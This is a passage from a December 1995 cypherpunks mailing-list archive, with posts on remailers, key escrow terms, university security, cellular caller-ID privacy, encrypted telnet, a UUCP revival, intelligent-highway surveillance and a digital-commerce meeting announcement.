> My friend Clark wrote:
> 
> >Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
> >money."
> 
> I believe that was Woodward & Bernstein. They were referring to some
> right-wing wackos who had flagrantly broken the law investigating their
> political opposition, then very sloppily tried to cover it up. Woodward &
> Bernstein brought down a President. I think they're cool (though they seem
> to have rested on their laurels, and their subsequent work is less
> impressive). 
> 
Actually, I think it was Woodward's source, "Deep Throat," who said 
"Follow the money."

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 16 Dec 1995 04:49:12 +0800
To: cypherpunks@toad.com
Subject: Re: .PWL spin
Message-ID: <199512151829.KAA13449@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995, Joel McNamara wrote:

> One system administrator said the problem would have a greater effect on
> less-secure environments, such as universities and other institutions,
> than on corporations.

I didn't quite understand the "corporate speak" here.  It sounds like
something coming from Bosnia or something.  It's Greek to me.

What would make a University less secure than a corporation??

Universities (at least the ones, I've checked) have entire departments
and theoreticians devoted to Computers ... companies usually don't.  

I'd think that Universities are much, much more secure environments than
corporations are.  Doesn't Microsoft know this??  Or is this unique to
Seattle?? 



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 16 Dec 1995 04:00:16 +0800
To: cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <199512151846.KAA14526@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Peter Trei wrote:

> This guy's home page is a hoot - he's into UFO contacts and dolphin
> communication.
> 
> After writing to him and getting back a description of his system, it's
> clear that he's clueless. He seems to think that info sent to a vendor
> using his system can't be sorted out from the gazillion other packets
> on the Net. 
> 
> I described to him sniffer attacks, subverted routers, etal, and
> reccomended some basic reading (Cheswick & Bellovin, 

Is this the two partners in crime from AT&T??  Cheswick & Bellovin??

I think that they're probably not all that reputable (or knowledgable)
from what I've seen of their writings and contributions to the AT&T DSRP 
(Data Security Response Program) mailing list. 

(If they are the same people, I mean ...)

> Kaufmann, Perlman, & Speciner, and Schneier). He said he'd
> look into it. (Yes, I know there's plenty of other attacks, such as
> OSPF spoofing, but I didn't describe them).
> 
> I think we can educate this guy. 

Plenty of educating can probably be done, I think.



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: john.ellis@wmcmail.wmc.ac.uk
Date: Sat, 16 Dec 1995 20:33:31 +0800
To: andreas@artcom.de>
Subject: Algorithims ?
Message-ID: <9511158190.AA819065181@wmcmail.wmc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


     Were can i get a set of the most popular algorithims from for 
     encryption, and does any one have and info on the algorithim used in 
     the second WW by the germans, (The Enigma system) any info would be 
     greatfully recieved
     
     Cheers John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 16 Dec 1995 02:05:01 +0800
To: cypherpunks@toad.com
Subject: DCSB: Future Scenarios for e$
Message-ID: <v02120d0facf746b17af7@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                      Art Hutchinson and John Kelly
                Northeast Consulting Resources Inc., (NCRI)

                      "Future Scenarios for e$"


                        Tuesday, January 2, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Mr. Hutchinson is a Senior Consultant at Northeast Consulting Resources,
Inc. (NCRI).  His primary area of focus is NCRI's Information Commerce
practice. He has advised clients on the application of different approaches
to, and technologies for managing (and getting paid for) digital
intellectual property on the Internet, the World Wide Web, and
private/hybrid networks.

Mr. Hutchinson is an active member of the Electronic Rights Management Group
of the Information Industry Association, and a founding member of the
Digital Commerce Society of Boston.  He speaks regularly at conferences on
the topic of rights management in cyberspace  He is a principal contributor
to NCRI's Future Mapping(r) conferences, including "The Future of
Information Commerce" and "The Great Infrastructure Debate"(r).  Prior to
joining NCRI, Mr. Hutchinson was Director of Consulting Services at BIS
Strategic Decisions. Prior to BIS, Mr. Hutchinson managed the Distribution
Channels Information Service at International Data Corp. (IDC).


Mr. Kelly, a Senior Consultant at Northeast Consulting Resources, Inc.
(NCRI), has specialized in designing group planning and decision making
activities that help teams clarify their strategic options.  He also
analyzes new applications in multimedia training and groupware.  He is one
of the leaders of the Mapping the Future of Information Commerce seminars.

Mr. Kelly has led seminars on strategic planning and Future Mapping for a
large international oil company, a Fortune 100 diversified manufacturing
company, a leading computer hardware and systems company, and numerous
software and telecommunications companies.  He has contributed to the
development of databases of critical events that help companies chart their
future business opportunities in the areas of computing, communications, and
interactive multimedia. Before joining NCRI, Mr. Kelly served as an
Associate Editor and consultant for the Seybold Office Computing Group. Mr.
Kelly also worked for the Information Systems Group at Lotus Development
Corporation and was the Director of Interactive Technology Projects at the
WGBH Educational Foundation. Prior to that, Mr. Kelly was Manager of the
Seminar Division at Information Mapping, Inc. and later served as a
consultant to IMI.


Art says:

>Art Hutchinson and John Kelly of Northeast Consulting Resources, Inc. (NCRI)
>will facilitate an interactive exercise that helps to paint a picture of the
>group's collective thinking about future events and milestones
>in the development of electronic commerce.  Specifically, we will be culling
>through the last year of posts to www-buyinfo, e-payment, and various other
>mailing lists, as well as our own database of 17,000 "events" used in
>previous scenario planning conferences.  From this, we will be create a set
>of about 40 potential future events which - depending upon whether they
>happen or not - will drive the digital commerce arena in varying directions.
>
>
>Everyone at the lunch will be given an opportunity to 'vote' on and discuss
>with their peers the likelihood (or un-likelihood) of these events happening
>within a particular time frame.  After the 'voting', we will lead a
>discussion of what the results might mean, and how some things that this
>group believes correspond to what other corporate and industry groups have
>said in the recent past in voting on some of the same events.  Suggestions
>for controversial, interesting, watershed events that might happen in the
>digital commerce arena over the next 3-5 years are welcome.  Please e-mail
>them directly to Art Hutchinson at <hutchinson@ncri.com>

This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, January 2, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
December 30 (that's two weeks from this Saturday), or you won't be on the list
for lunch. Checks payable to anyone else but The Harvard Club of Boston will
have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with a few glacial A/P departments ourselves, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 February    Fred Hapgood     Freelance Author
 March       Glenda Barnes    X.9 Electronic Commerce Security Group
 April       Donald Eastlake  CyberCash
 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Bob Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNGdJPgyLN8bw6ZVAQGSgQP/Q5PfwoevxNRBaC1B6dUaIDl07bhGTpSm
v9pYx3kuHTEc0Mei3Zzxj4G/yaSGFHoOuz8rslxsKBIrsLeB0Xc7gehs8OjgXsuU
fcR6gvT4mlY9Mvs8E9MaeTlTlHAz5R38g1lv1ST4Xti7kBQ4l9EEErTjPOM4oHy/
6kglzZsCSM4=
=QJbV
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Sat, 16 Dec 1995 02:06:34 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Algorithims
In-Reply-To: <9511158190.AA819065181@wmcmail.wmc.ac.uk>
Message-ID: <Pine.SOL.3.91.951215113602.23438B-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain





       For information on Enigma try "APPLIED CRYPTOGRAPHY"
by Bruce Schneier page 11 and 364.  Page 11 gives a brief
summary of it and provides some info and other material
covering it.  Page 364 does the same.  In case you do not
have access to the book ( which of course is a sin ) here are
some of the references.

       "THE CODEBREAKERS" by D. Kahn    1983
       "CRYPTANALYSIS of the HAGLEN CRYPTOGRAPH" by W.G. Barker  1977
       "THE BLACK CHAMBER: A COLUMN; HOW THE BRITISH BROKE ENIGMA" by
    C.A. Deavours    Crptologia, v.4,n.3,Jul 1980,pp 129-132





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 16 Dec 1995 04:58:42 +0800
To: <cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <9512151643.AA12546@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



 At 05:17 PM 12/13/95 -0600, you wrote:
>Dr. Brian L. Crissey includes in his .sig, courtesy of cactus@hks.net
>>[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ]
>> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
>> (503)-434-2426 brianc@linfield.edu
>> Professionals built the Titanic, amateurs built the Ark...
>
>However, the Ark was *designed* by GOD (if you believe the story).  Can Dr.  
>Brian L. Crissey say the same thing about his payment system?

This guy's home page is a hoot - he's into UFO contacts and dolphin
communication.

After writing to him and getting back a description of his system, it's
clear that he's clueless. He seems to think that info sent to a vendor
using his system can't be sorted out from the gazillion other packets
on the Net. 

I described to him sniffer attacks, subverted routers, etal, and
reccomended some basic reading (Cheswick & Bellovin, 
Kaufmann, Perlman, & Speciner, and Schneier). He said he'd
look into it. (Yes, I know there's plenty of other attacks, such as
OSPF spoofing, but I didn't describe them).

I think we can educate this guy. 

speaking only for myself,
Peter Trei  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Sat, 16 Dec 1995 02:44:29 +0800
To: cypherpunks@toad.com
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <9511158190.AA819055487@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     Obviously, we need a certificate authority that will digitally sign 
     personal identification documents (Name, address, photo (digitized), 
     date of birth, etc.)
     
     Martin G. Diehl


______________________________ Forward Header __________________________________
Subject: Re: e-mail forwarding, for-pay remailers
Author:  "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> at Internet-USA
Date:    12/13/95 5:33 PM


From: IN%"gbroiles@darkwing.uoregon.edu"  "Greg Broiles" 13-DEC-1995 03:40:50.49
     
>I don't have much faith that the people who are currently doing the DNS 
for my domain name (goldenbear.com) are going to do anything about the
current bouncing-messages phenomenon anytime soon, so I'm looking into other 
ways to get & send E-mail 
[snip]
     
netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage 
or forwarding for people; 
[snip]
       There's one problem with this in regards to the "no necessary
connection," and that 's the governmental requirement for mail forwarding. MBE 
and any legal other one will want to see at least two forms of ID including one 
photo, and have a form that they fill out using that and send to the local
post office. Anyone have a way around this problem?
       -Allen

The following is an attached File item from cc:Mail.  It contains
information that had to be encoded to ensure successful transmission
through various mail systems.  To decode the file use the UUDECODE
program.
--------------------------------- Cut Here ---------------------------------
begin 644 RFC822.TXT
M4F5C96EV960Z(&9R;VT@9V%T93$N9'1T=7,N8V]M(&)Y(&-C,BYD='1U<RYC
M;VT@*%--5%!,24Y+(%8R+C$Q(%!R95)E;&5A<V4@-"D-"B`@("`[(%=E9"P@
M,3,@1&5C(#DU(#$W.C,S.C0W($-35`T*4F5T=7)N+5!A=&@Z(#QO=VYE<BUC
M>7!H97)P=6YK<T!T;V%D+F-O;3X-"E)E8V5I=F5D.B!F<F]M(')E;&%Y,RY5
M52Y.150@8GD@9V%T93$N9'1T=7,N8V]M("@U+G@O4TU)+5-64C0I#0H@("`@
M:60@04$Q,3`P.3L@5V5D+"`Q,R!$96,@,3DY-2`Q-SHS,#HU-R`M,#8P,`T*
M4F5C96EV960Z(&9R;VT@=&]A9"YC;VT@8GD@<F5L87DS+E55+DY%5"!W:71H
M(%--5%`@#0H@("`@:60@45%Z='IO,#$W.#@[(%=E9"P@,3,@1&5C(#$Y.34@
M,3@Z,3,Z-30@+3`U,#`@*$535"D-"E)E8V5I=F5D.B!B>2!T;V%D+F-O;2!I
M9"!!03$R,#(Y.R!7960L(#$S($1E8R`Y-2`Q,SHR,SHS,2!04U0-"E)E8V5I
M=F5D.B!F<F]M($]#14Q/5"Y2551'15)3+D5$52!B>2!T;V%D+F-O;2!I9"!!
M03$R,#$R.R!7960L(#$S($1E8R`Y-2`Q,SHR,SHR,2!04U0-"E)E8V5I=F5D
M.B!F<F]M(&UB8VPN<G5T9V5R<RYE9'4@8GD@;6)C;"YR=71G97)S+F5D=2`H
M4$U$1B`C,3(Q.30I(&ED#0H@/#`Q2%E22E-54T9,4SA9-%HS1T!M8F-L+G)U
M=&=E<G,N961U/CL@5V5D+"`Q,R!$96,@,3DY-2`Q-CHQ.2!%1%0-"D1A=&4Z
M(%=E9"P@,3,@1&5C(#$Y.34@,38Z,3D@1414#0I&<F]M.B`B12X@04Q,14X@
M4TU)5$@B(#Q%04Q,14Y334E42$!M8F-L+G)U=&=E<G,N961U/@T*4W5B:F5C
M=#H@4F4Z(&4M;6%I;"!F;W)W87)D:6YG+"!F;W(M<&%Y(')E;6%I;&5R<PT*
M5&\Z(&=B<F]I;&5S0&1A<FMW:6YG+G5O<F5G;VXN961U#0I#8SH@8WEP:&5R
M<'5N:W-`=&]A9"YC;VT-"DUE<W-A9V4M260Z(#PP,4A94DI355-&3%,X631:
M,T=`;6)C;"YR=71G97)S+F5D=3X-"E@M16YV96QO<&4M5&\Z(&-Y<&AE<G!U
M;FMS0'1O860N8V]M#0I8+59M<RU4;SH@24XE(F=B<F]I;&5S0&1A<FMW:6YG
M+G5O<F5G;VXN961U(@T*6"U6;7,M0V,Z($E.)2)C>7!H97)P=6YK<T!T;V%D
M+F-O;2(-"E-E;F1E<CH@;W=N97(M8WEP:&5R<'5N:W-`=&]A9"YC;VT-"E!R
096-E9&5N8V4Z(&)U;&L-"@``
 
end





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Fri, 15 Dec 1995 20:29:58 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <Pine.SUN.3.91.951214144159.12822D-100000@crl.crl.com>
Message-ID: <30d162b0.1566429@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995 14:50:19 -0800 (PST), Sandy Sandfort wrote:

> So far, no one has come up with anything stronger than specula-
> tion about my database question.  Some "anonymous" told me how
> easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
> didn't give the guy my phone number.

These CD-ROMs can be searched for most any combination of name, street
name, city, state, zip and area code.

Given a relatively uncommon name and a zip code, it's not surprising
they could come up with only one hit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 16 Dec 1995 04:07:51 +0800
To: cypherpunks@toad.com
Subject: Encrypted telnet...
Message-ID: <9512151848.AA20590@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



I am looking for an encrypted telnet (or rlogin/etc) package
that supports a Windoze client.  

It looks like all the normal ones that I can find 
(SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids.  
Don't get me wrong - I would prefer to use Unix, but I am
headed off to locations, where I know all I'll have access to 
is Windows, with a PPP stack to some ISP.

I'ld write it myself, - pasteing different packages together,
but I need it working in a day or two.  Can anyone help me here?  


Thanks,
Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 16 Dec 1995 06:49:01 +0800
To: cypherpunks@toad.com
Subject: Re: "Strongly Voluntary" Key Escrow
Message-ID: <199512152102.NAA27308@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:10 12/15/95 -0500, Jim Ray wrote:
>"Government Key Certification" might be an OK compromise-term compared
>to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As
>you know, I prefered the term "FUCKED," but now we must be "decent" in
>our communications. <sigh>

I suggest Forced Key Deposit (FKD) (when some non-governmental entity e.g.
an employer forces you to send copies of your keys to some depository), and
Voluntary Key Deposit (VKD), when you chose to deposit a copy of your key
with some third party.  I love the way GAK sounds, so I support it even the
whole concept is really FUCKED.  Whenever I hear, "Government Key
Certification", I think of digital signatures, not communication privacy.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 16 Dec 1995 09:46:59 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: NET - HLR on highway privacy (fwd)
Message-ID: <Pine.SUN.3.91.951215135340.12467B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


I hadn't seen this cross the list yet...

------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

---------- Forwarded message ----------
Date: Mon, 11 Dec 1995 05:59:53 -0600
From: FringeWare Daily <email@fringeware.com>
Subject: NET - HLR on highway privacy

Sent from: hlr@well.com (Howard Rheingold)

We Need Privacy Protection On Intelligent Highways
	-- By Howard Rheingold

	Ominous steps have been taken recently, steps that perhaps move us
all closer to a global surveillance state, but few people are aware of them.
Governments around the world are installing "intelligent highways," whose
snooping capabilities ought to concern every driver.
	I recently remarked to my friend Peter, as he drove me  around
Geneva, that he is scrupulous about obeying the speed limit. He told me in
reply that he had on a previous occasion received in his mailbox an envelope
containing a photograph of his automobile, the radar detector readout
superimposed, along with a notice of his fine. On key Swiss roads, radar
detectors automatically videotape speeders, computers automatically
recognize the license plate number, check it against a database, and issue
mail to the home address of the owner. It happens in Japan, too, and more
and more locations around the world..
	If my Swiss friend had not told me that story, the hair on the back
of neck would not have started to stand up when I read, the next day, in the
October 9, 1995 edition of the International Herald Tribune, that Kansas
became the tenth state to adopt electronic toll collection. Electronic
transponders installed in vehicles automatically communicate with toll
collecting machinery via radio, and tolls are automatically deducted from
the driver's account. The following day, October 10, the same newspaper
reported that Singapore had announced contracts to wire up the road system
of the entire city-state. Singapore, never known as a bastion of civil
liberties, will be able to track the location of every vehicle, and identify
most drivers, on a minute-by-minute basis.
	 A government and private industry initiative now underway proposes
multibillion dollar investments in "Intelligent Vehicle Highway Systems"
(IVHS) in the US. These systems, combining massive numbers of embedded
sensors, video cameras, chips embedded in vehicles, and even satellite
global positioning signals, are now under construction in every
industrialized country. IVHS promise greater convenience and perhaps safety
by monitoring highway traffic, routing around jams, and automatically
collecting tolls. If these systems are not designed with the privacy of
citizens in mind, however, we might be buying a heap of surveillance
capabilities for future secret police. This is a technology policy issue
where informed groups of citizens can have an impact if we act now. It isn't
a matter of banning the technology. It's a matter of making sure today that
these systems are designed with the privacy of future citizens in mind.
	One of the best sources of information about the social impact of
IVHS comes from Professor Phil Agre at the University of California, San
Diego. Agre stated recently: "Society may decide that it wishes to provide
law enforment with generalized abilities to track citizens' movements, but
this would clearly be a grave decision - one that should be discussed well
in advance rather than building the technical capabilities into ITS systems
with virtually no public discussion."
	There is a technical fix, however. Encryption techniques make it
possible to transmit account information from an automobile without
disclosing the identity of the owner.
	 However, it is critically important that the early majority of
transponder manufacturers build encryption capabilities into their devices.
Making privacy a standard will work far better than attempts at legislative
regulation after the market has settled on a standard.
	 Agre's reports can be found on the Web at
http://communication.ucsd.edu/pagre/rre.html. To access his
whimsically-named but extremely useful "Red Rock Eater News Service," via
e-mail send a message to rre-request@weber.ucsd.edu, Subject: archive help.
	We still have time to do something about this one. We need to ask
manufacturers now to consider the importance of building privacy protection
into their technology. I support Agre's statement that "People need to use
roads to participate in the full range of associations (educational,
political, social, religious, labor, charitable, etc) that make up a free
society.  If we turn the roads into a zone of total surveillance then we
chill that fundamental right and undermine the very foundation of freedom."
END







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Sat, 16 Dec 1995 13:09:13 +0800
To: cypherpunks@toad.com
Subject: Re: .PWL spin
In-Reply-To: <199512151829.KAA13449@jobe.shell.portal.com>
Message-ID: <30d1d41c0e04002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, anonymous-remailer@shell.portal.com said:
> 
> 
> On Sat, 9 Dec 1995, Joel McNamara wrote:
> 
> > One system administrator said the problem would have a greater effect on
> > less-secure environments, such as universities and other institutions,
> > than on corporations.
> 
> I didn't quite understand the "corporate speak" here.  It sounds like
> something coming from Bosnia or something.  It's Greek to me.
> 
> What would make a University less secure than a corporation??

1) Usually more net connected hosts.
2) Lack of adequate sysadmin attention/knowlege.
3) Vague and poorly enforced site security policies.

This is of course a generalization, but corporations seem to
have more money and time to throw at security. On the other 
hand, it's common at Universities to get a new Sun/SGI/whatever,
hook it to the net, and run it without spending a lot of time
configuring it. 

> 
> Universities (at least the ones, I've checked) have entire departments
> and theoreticians devoted to Computers ... companies usually don't.  

Just because a University has a CS department doesn't mean that it
is more secure. Even if security is an area of study, it doesn't
mean that other departments benefit from the research.

> 
> I'd think that Universities are much, much more secure environments than
> corporations are.  Doesn't Microsoft know this??  Or is this unique to
> Seattle?? 

I don't know what University sites you're referring to, my experience
has been that on the average, .edu sites are less secure than .com
sites.

-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 16 Dec 1995 04:11:37 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Pornographic stories
In-Reply-To: <Dgo5FD5w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951215135735.12467C-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995, Dr. Dimitri Vulis wrote:

> > 	In fact I've suggested to several people that we start
> > 	a dial-up uucp revival for this and related reasons.  (If
> > 	the number of users/webpages and the bandwidth usage continues
> > 	to increase at the recent rates -- without a corresponding
> > 	improvement in the infrastructure we'll probably all want to
> > 	go back to uucp for mail and news anyway.  Old fashioned dial-up
> > 	may be faster than T1 access in a few years and direct point-to-
> > 	point uucp over ISDN is probably faster already.
[...]
> > 		Anyone else want to participate in the great '90's
> > 		uucp revival?  I'm in Santa Clara and could use
> > 		some feeds and some help with the setup.
> 
> I'm all for it. My site is connected to the rest of the world via dial-up
> UUCP, I haven't touched the setup in 5 years, and am not planning to.
> 
> It might be interesting to have a variation of dial-up UUCP where site 1
> passes encrypted stuff to site 2 and doesn't quite know what site 3 they're
> supposed to go on to. Sort of like the remailers with encryption.

This definitely seems like a good idea to me, especially with the 
encrypted link.  Is the encrypted link software written, or need we hack 
a few perl scripts?

The mechanics seem simple enough....


------------------------------------------------------------------------------
JonJon Lasser                <jlasser@rwd.goucher.edu>            
(410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Dec 1995 05:54:15 +0800
To: cypherpunks@toad.com
Subject: INT_mes
Message-ID: <199512151914.OAA04065@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The WP, Dec 15, 1995:


   Internet Mess: Return to Sender [Editorial]

   The negotiations between House and Senate conferees on the
   restriction of pornography in cyberspace have gone from bad
   to worse. A tentative accommodation arrived at last night,
   which the conferees must still vote to accept or kill,
   combines some of the worst of a broad array of misguided
   restrictions on speech, none of them likely to protect
   children.


   INT_mes



   Digital claims that its new crawler called Alta Vista, can
   find data on the World Wide Web at speeds of up to 100
   times faster than currently popular crawlers from Yahoo
   Corp., Open Text Corp. or Lycos Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 16 Dec 1995 05:00:43 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISY] Re: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
In-Reply-To: <Pine.ULT.3.91.951214232857.10286G-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951215141513.12467E-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Rich Graves wrote:

> >Thanks (belatedly) for posting this, Russell.  Who was it said, "Follow the
> >money."
> 
> I believe that was Woodward & Bernstein. They were referring to some
> right-wing wackos who had flagrantly broken the law investigating their
> political opposition, then very sloppily tried to cover it up. Woodward &
> Bernstein brought down a President. I think they're cool (though they seem
> to have rested on their laurels, and their subsequent work is less
> impressive). 

Actually, W&B attributed the line to "Deep Throat," their 
(note:cypherpunks relevance) anonymous source...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Sat, 16 Dec 1995 13:09:15 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512152023.OAA13271@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain




>> any type of billing information to the phone company.  The number is also by
>> nature unlisted and the only way to get it is by you or the cellular 
>> carrier.  If the cellular carrier gives your number out without your
>> permision or a court order they are in BIG trouble..
>
>My untrained brain sees two problems with this:
>
>1) Cellular systems are inherently less secure than standard telephones,
>as anyone who can afford a decent scanner can listen to your conversations
>at will.


I was speaking more secure in that the billing information is much harder to
get.  If someone had the time, money, and equipment to track a particular
person at a specific location making a cellular phone call from a given
number they would most likely already have the means of getting the
information an easier way.

>2) You're relying on someone other than yourself to protect your security,

I do agree that letting anyone other than yourself control your personal
information is bad!  It happens all to often.


>which is always a bad idea. Cellular carriers, Ma Bell, anyone. Does anyone
>on this list really believe that representatives of these organizations
>would think twice about bending over and spewing out everything they know
>about you? They do it all the time, without your permission and without
>valid court orders. 

At least 50% of the cellular carriers are not telco related.  Giving out
cellular numbers and names is a tabbo NONO for cellular carriers.  If
cellular customers start getting sales calls from a company that received a
list from a cellular carrier, the cellular carrier is obligated to refund
the customers bill for those calls if the customer complains becuase the
customer pays for calls comming or going.

I don't feel that cellular is completely private or secure but its getting
much better with the addition of digital cellular.  The problem with digital
is that the conversations are more secure but the information about the
people calling is not.  Digital cellular and PCS offers ANI and a bunch of
other identifying information.

                                Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Sat, 16 Dec 1995 05:06:00 +0800
To: cypherpunks@toad.com
Subject: RE: ADDRESS DATABASE?
Message-ID: <199512152036.OAA13659@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>Not. As of 12/1/95, the FCC requires all cellular carriers (and IXCs for 
>that matter) to transmit ANI & CLID information, even on cellular calls. 
>BellSouth thoughtfully put a notice in my last two monthly bills, but then 
>again I think the FCC required that too.
>
>-Paul

At least I know that my cellular carrier is safe for now.  The phone company
in our area still can't handle ANI from the cellular switch.  The default
number for our carrier ends in 0000 which happens to be my number.  I get
calls every month from people with 800 numbers verifying what number this
was.  I have to explain that someone from our cellular system made a call to
their number but the bill defaults to mine.  Its no big deal since I work
for the cellular carrier though.  ;)

                        Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
